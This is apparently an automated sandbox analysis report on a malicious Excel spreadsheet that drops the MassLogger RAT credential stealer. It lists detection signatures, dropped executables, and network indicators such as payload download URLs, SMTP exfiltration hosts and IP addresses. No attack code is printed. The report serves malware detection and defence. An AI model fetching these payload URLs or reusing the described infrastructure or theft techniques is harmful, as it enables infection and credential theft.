Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name: LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID: 356267
MD5: 8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1: 61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256: 35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags: ESPgeoOutlookxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected MassLogger RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the startup folder
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
May check the online IP address of the machine
Office process drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://pastex.pro Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\a.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\a.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\PROGRAMDATA\a.exe Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: mensajeria_system[1].exe.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\ProgramData\a.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.seyranikenger.com.tr
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Networking:

barindex
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.225.220.115 54.225.220.115
Source: Joe Sandbox View IP Address: 54.225.220.115 54.225.220.115
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: fUsage: https://www.youtube.com/watch?v=Qxk6cu21JSg equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.seyranikenger.com.tr
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org/
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org4
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.orgD
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify8
Source: a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: powershell.exe, 0000000A.00000002.810606306.0000000000D7C000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.cg
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp String found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0M
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicm
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0A
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp String found in binary or memory: http://pastex.pro
Source: a.exe, a.exe, 00000014.00000000.833793134.0000000000B22000.00000002.00020000.sdmp, mensajeria_system[1].exe.0.dr String found in binary or memory: http://pastex.pro/b/AEmdBGcmp
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngP
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp String found in binary or memory: http://smtp.saleforceconsults.com
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.office.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.onedrive.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://augloop.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cdn.entity.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cortana.ai/api
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://cr.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
